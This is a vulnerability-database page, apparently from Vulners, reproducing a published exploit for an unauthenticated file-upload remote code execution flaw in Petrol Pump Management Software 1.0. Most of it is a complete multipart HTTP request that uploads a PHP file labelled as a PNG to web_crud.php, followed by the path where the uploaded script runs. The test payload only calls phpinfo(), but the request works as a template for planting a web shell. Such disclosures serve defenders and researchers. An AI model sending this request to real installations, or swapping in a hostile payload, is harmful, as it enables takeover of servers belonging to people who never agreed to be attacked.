Vulners
Lucene search
Petrol Pump Management Software 1.0 Shell Upload
`# Exploit Title: Petrol pump management software - File Upload Remote Code Execution (RCE) (unauthenticated)
# Google Dork: N/A
# Application: Petrol pump management software
# Date: 20.02.2024
# Bugs: File Upload Remote Code Execution (RCE) (unauthenticated)
# Exploit Author: SoSPiro
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html
# Version: 1.0
# Tested on: Windows 10 64 bit Wampserver
# CVE : N/A
## Vulnerability Description:
Due to a security vulnerability in "fuelflow/admin/app/web_crud.php," unauthorized users can upload
files using the "POST" method. The uploaded files are stored in the "/fuelflow/assets/images" folder.
This allows malicious individuals to execute unauthorized commands on the system.
## Staus: HIGH-CRITICAL Vulnerability
## Proof of Concept (PoC):
Video:
https://drive.google.com/file/d/1_jue-UhpASC_XxcUWU-QhMYDrSIehnWx/view
// File upload Request
POST /zerday/fuelflow/admin/app/web_crud.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------82750242321210078514140255085
Origin: http://localhost
Connection: close
Referer: http://localhost/zer/fuelflow/admin/web.php
Cookie: PHPSESSID=1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------82750242321210078514140255085
Content-Disposition: form-data; name="id"
1
-----------------------------82750242321210078514140255085
Content-Disposition: form-data; name="old_photo1_img"
test.png
-----------------------------82750242321210078514140255085
Content-Disposition: form-data; name="photo1"; filename="3.php"
Content-Type: image/png
<?php phpinfo();?>
-----------------------------82750242321210078514140255085
Content-Disposition: form-data; name="title"
FuelFlow lite - Developed by Mayuri K. tessss
-----------------------------82750242321210078514140255085
Content-Disposition: form-data; name="old_photos_img"
test.png
-----------------------------82750242321210078514140255085
Content-Disposition: form-data; name="photos"; filename=""
Content-Type: application/octet-stream
-----------------------------82750242321210078514140255085
Content-Disposition: form-data; name="sitekey"
test
-----------------------------82750242321210078514140255085
Content-Disposition: form-data; name="secretkey"
test
-----------------------------82750242321210078514140255085
Content-Disposition: form-data; name="update"
-----------------------------82750242321210078514140255085--
// Phpinfo file locaton
/zerday/fuelflow/assets/images/65d45a6080eca.php
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Feb 2024 00:00Current
7.4High risk
Vulners AI Score7.4